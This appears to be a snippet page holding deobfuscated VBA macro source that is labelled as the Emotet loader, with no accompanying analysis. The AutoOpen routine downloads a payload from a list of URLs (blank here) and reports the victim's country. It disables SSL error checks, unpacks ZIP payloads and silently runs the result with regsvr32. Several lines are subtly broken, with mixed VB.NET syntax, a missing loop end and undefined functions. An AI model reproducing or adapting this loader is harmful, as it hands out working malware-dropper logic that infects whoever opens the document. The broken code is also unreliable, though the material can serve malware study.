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Created March 19, 2023 10:23
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Deobfuscated Emotet VBA Macro code
Function GenerateFilePath() As String
pathPropertyName = "Path"
pathSeparator = "\"
index = 2
documentPath = CallByName(ActiveDocument, pathPropertyName, index)
currentTime = GetFormattedTime()
GenerateFilePath = documentPath & pathSeparator & currentTime
End Function
Sub runRegsvr(filePath As String)
Dim shellObject As Object
Dim commandString As String
executableFile = "regsvr32.exe"
parameters = "/s "
quote = """"
parameters = parameters & quote & filePath & quote
Set shellObject = createShellObject()
runShellExecute shellObject, executableFile, parameters
End Sub
Function isPEFile(fileBytes() As Byte) As Integer
Dim result As Integer
result = 0
isPEFile = result
Dim minBytes As Integer
minBytes = 1
If UBound(fileBytes) > minBytes Then
Dim mByte As Integer
mByte = 77 '"M"
Dim zByte As Integer
zByte = 90 '"Z"
If fileBytes(0) = mByte And fileBytes(1) = zByte Then 'PE FILE
Dim isPE As Integer
isPE = 1
isPEFile = isPE
End If
Dim pByte As Integer
pByte = 80
Dim kByte As Integer
kByte = 75
If fileBytes(0) = pByte And fileBytes(1) = kByte Then 'ZIP file'
Dim isPEPlus As Integer
isPEPlus = 2
isPEFile = isPEPlus
End If
End If
End Function
Sub SendHttpRequest(request As Object)
Dim methodName As String
methodName = "Send"
Dim argCount As Integer
argCount = 1
CallByName request, methodName, argCount
End Sub
Sub AutoOpen()
Dim savepath As String
url1 = ""
url2 = ""
url3 = ""
url4 = ""
url5 = ""
url6 = ""
url7 = ""
file_extension = ".tmp"
savepath = GenerateFilepath() // 'Generate a filepath with the current time formatted as "hhmmss" and assign it to savepath
savepath = savepath & file_extension 'Append the file extension to savepath.
Dim downloadsuccess As Boolean
If Not downloadsuccess Then
downloadsuccess = DownloadFile(url1, savepath) 'Attempt to download a file from url1 and save it to savepath. If successful, set downloadsuccess to True.
End If
If Not downloadsuccess Then
downloadsuccess = DownloadFile(url2, savepath) 'If not successful, try to download files from urls 2 to 7, and set downloadsuccess to True if any of the downloads succeed.
End If
If Not downloadsuccess Then
downloadsuccess = DownloadFile(url3, savepath)
End If
If Not downloadsuccess Then
downloadsuccess = DownloadFile(url4, savepath)
End If
If Not downloadsuccess Then
downloadsuccess = DownloadFile(url5, savepath)
End If
If Not downloadsuccess Then
downloadsuccess = DownloadFile(url6, savepath)
End If
If Not downloadsuccess Then
downloadsuccess = DownloadFile(url7, savepath)
End If
If downloadsuccess Then 'If downloadsuccess is True, run the runRegsvr function passing savepath as a parameter.
runRegsvr savepath 'execute regsvr32.exe /s <savepath>
End If
End Sub
Sub runShellExecute(obj As Object, executablePath As String, arguments As String)
Dim windowStyle As String
windowStyle = " "
Dim functionName As String
functionName = "ShellExecute"
Dim callType As Integer
callType = 1
CallByName obj, functionName, callType, executablePath, windowStyle & arguments
End Sub
Function GetFormattedTime() As String
Dim timeFormat As String
timeFormat = "hhmmss"
Dim currentTime As Date
currentTime = Now()
GetFormattedTime = Format(currentTime, timeFormat)
End Function
Function efyCWo() As Boolean
End Function
Sub SaveBytesToFile(bytes() As Byte, filepath As String)
Dim stream As Object
Set stream = CreateObject("ADODB.Stream")
SetBinaryMode stream
WriteBytesToFile stream, bytes
SaveToFile stream, filepath
CloseStream stream
End Sub
Function objWinHttp() As Object
oTgqq = "WinHttp.WinHttpRequest.5.1"
Set objWinHttp = createObject(oTgqq)
End Function
Sub DeleteFolder(pthJgp As Object, mMxbNE As String)
bFtJppJ = "DeleteFolder"
Dim eNlri As Integer
eNlri = 1
CallByName pthJgp, bFtJppJ, eNlri, mMxbNE
End Sub
Function createObject(className As String) As Object
Set createObject = CreateObject(className)
End Function
Function GetResponseBody(tynaamx As Object) As String
rvS = "responseBody"
Dim Mbm As Integer
Mbm = 2
ResponseBody = CallByName(tynaamx, rvS, Mbm)
End Function
Sub CreateFolder(obj As Object, path As String)
Dim methodName As String
methodName = "CreateFolder"
Dim param As Integer
param = 1
CallByName obj, methodName, VbMethod, path
End Sub
Sub DeleteFile(objFSO As Object, filePath As String)
deleteFile = "DeleteFile"
Dim iReturn As Integer
iReturn = 1
CallByName objFSO, deleteFile, iReturn, filePath
End Sub
Sub WriteBytesToFile(fileObject As Object, byteArray() As Byte)
Dim writeMethod As String
writeMethod = "Write"
Dim writeMode As Integer
writeMode = 1
CallByName fileObject, writeMethod, writeMode, byteArray
End Sub
Function GetFolderNamespace(objFSO As Object, folderPath As String) As Object
Dim folderNamespace As Variant
Dim namespaceKeyword As String
namespaceKeyword = "Namespace"
folderNamespace = CVar(folderPath)
Dim namespaceCallType As Integer
namespaceCallType = 1
Set GetFolderNamespace = CallByName(objFSO, namespaceKeyword, namespaceCallType, folderNamespace)
End Function
Function DownloadFile(urlAs String, localPath As String) As Boolean
Dim oWinhttp As Object
Dim UmzVw As Object
Dim Ql As Object
Dim TDVqFfZ As Object
Dim datetimenow As String
Dim avdbm As String
Dim respBody() As Byte
Dim jlONwQjJ As Integer
Dim VDOd As String
Dim NDfmg As String
DownloadFile = False
HEFogEXS = "?"
BcnONkW = "&c="
datetimenow = lUE()
avdbm = url & "?" & datetimenow & "&c=" & System.CountryRegion
On Error GoTo bkKdCB
Set oWinhttp = objWinHttp()
OpenHttpRequest oWinhttp, avdbm
SendHttpRequest oWinhttp
If IsHttpResponseOk(oWinhttp) Then
respBody = GetResponseBody(oWinhttp)
jlONwQjJ = isPEFile(respBody)
Dim heYTOT As Integer
heYTOT = 1
If jlONwQjJ = heYTOT Then
SaveBytesToFile respBody, localPath
DownloadFile = True
End If
Dim ijaD As Integer
ijaD = 2
If jlONwQjJ = ijaD Then
Set Ql = getFileSystemObject()
VDOd = GenerateFilepath()
CreateFolder Ql, VDOd
LBZso = ".zip"
NDfmg = VDOd & LBZso
SaveBytesToFile respBody, NDfmg
Set TDVqFfZ = GetShellApplication()
Set dGeu = GetFolderNamespace(TDVqFfZ, VDOd)
Set jpZoOF = GetFolderNamespace(TDVqFfZ, NDfmg)
HWfXYe = "CopyHere"
Dim Fl As Integer
Fl = 1
Dim RkqMfCQ As Integer
RkqMfCQ = 4
CallByName dGeu, HWfXYe, Fl, jpZoOF.Items, RkqMfCQ
kNUKtIG = "MoveFile"
For Each dpW In dGeu.Items
Dim kqKsOTxc As Integer
kqKsOTxc = 1
CallByName Ql, kNUKtIG, kqKsOTxc, dpW.Path, localPath
DeleteFolder Ql, VDOd
DeleteFile Ql, NDfmg
DownloadFile = True
End If
End If
Exit Function
DownloadFile = False
End Function
Function DownloadPEFile(url As String, localPath As String) As Boolean
Dim oWinHttp As Object
Dim fileSystemObj As Object
Dim shellApp As Object
Dim folderNamespace As Object
Dim archiveFolderNamespace As Object
Dim datetimeNow As String
Dim urlParams As String
Dim respBody() As Byte
Dim isPE As Integer
Dim archiveFolderPath As String
Dim archiveFilePath As String
Dim success As Boolean
DownloadPEFile = False
Dim urlParamSeparator As String = "?"
Dim countryCodeParam As String = "&c="
datetimeNow = GetLocalDateTime()
urlParams = url & urlParamSeparator & datetimeNow & countryCodeParam & System.CountryRegion
On Error GoTo ErrorOccurred
Set oWinHttp = CreateObject("WinHttp.WinHttpRequest.5.1")
OpenHttpRequest oWinHttp, urlParams
SendHttpRequest oWinHttp
If IsHttpResponseOk(oWinHttp) Then
respBody = GetResponseBody(oWinHttp)
isPE = IsPEFile(respBody)
If isPE = 1 Then 'PE File
SaveBytesToFile respBody, localPath
success = True
ElseIf isPE = 2 Then 'Zip archive
Set fileSystemObj = GetFileSystemObject()
archiveFolderPath = GenerateFilepath()
CreateFolder fileSystemObj, archiveFolderPath
archiveFilePath = archiveFolderPath & ".zip"
SaveBytesToFile respBody, archiveFilePath
Set shellApp = GetShellApplication()
Set folderNamespace = GetFolderNamespace(shellApp, archiveFolderPath)
Set archiveFolderNamespace = GetFolderNamespace(shellApp, archiveFilePath)
CallByName folderNamespace, "CopyHere", 1, archiveFolderNamespace.Items, 4
For Each item In folderNamespace.Items
CallByName fileSystemObj, "MoveFile", 1, item.Path, localPath
DeleteFolder fileSystemObj, archiveFolderPath
DeleteFile fileSystemObj, archiveFilePath
success = True
End If
End If
DownloadPEFile = success
Exit Function
DownloadPEFile = False
End Function
Sub CloseConnection(conn As Object)
methodName = "Close"
Dim argCount As Integer
argCount = 1
CallByName conn, methodName, argCount
End Sub
Function GetShellApplication() As Object
Dim shellAppString As String
shellAppString = "Shell.Application"
Set GetShellApplication = CreateObject(shellAppString)
End Function
Sub SetBinaryMode(obj As Object)
methodName = "Type"
Dim vbInteger As Integer
vbInteger = 4
Dim vbTrue As Integer
vbTrue = 1
CallByName obj, methodName, vbInteger, vbTrue
End Sub
Function IsHttpResponseOk(amYkWDJO As Object) As Boolean
Dim KBk As Long
BIqX = "Status"
Dim DfuVf As Integer
DfuVf = 2
KBk = CallByName(amYkWDJO, BIqX, DfuVf)
Dim EUciMBa As Integer
EUciMBa = 200
If KBk = EUciMBa Then
IsHttpResponseOk = True
End If
End Function
Function DecodedString(string_table As String, string_indexes() As Long, string_length As Long) As String
Dim string_out As String
Dim character As Variant
Dim BqDgbMrx As Integer
BqDgbMrx = 1
string_length = string_length - BqDgbMrx
Dim XlSn As Integer
XlSn = 0
For index = XlSn To string_length
Dim dUS As Integer
dUS = 1
character = Mid(string_table, string_indexes(index), dUS)
string_out = string_out & character
Next index
DecodedString = string_out
End Function
Function objADODBStream() As Object
zP = "ADODB.Stream"
Set objADODBStream = createObject(zP)
End Function
Sub Open(HCUquGfg As Object)
kcVTBAO = "Open"
Dim tryCO As Integer
tryCO = 1
CallByName HCUquGfg, kcVTBAO, tryCO
End Sub
Sub SaveToFile(k As Object, EJpuq As String)
WuppcEX = "SaveToFile"
Dim fLY As Integer
fLY = 1
Dim IkFgI As Integer
IkFgI = 2
CallByName k, WuppcEX, fLY, EJpuq, IkFgI
End Sub
Function getFileSystemObject() As Object
fileSystemObjectName = "Scripting.FileSystemObject"
Set fileSystemObject = createObject(fileSystemObjectName)
End Function
Sub OpenHttpRequest(httpObject As Object, url As String)
httpMethod = "Open"
httpVerb = "GET"
Dim async As Boolean
async = False
CallByName httpObject, httpMethod, 1, httpVerb, url, async
httpOption = "Option"
Dim resolveSslFlags As Integer
resolveSslFlags = 4
Dim ignoreSslErrors As Integer
ignoreSslErrors = 4
Dim intSslErrorIgnoreFlags As Integer
intSslErrorIgnoreFlags = 13056
CallByName httpObject, httpOption, resolveSslFlags, resolveSslFlags, intSslErrorIgnoreFlags
End Sub
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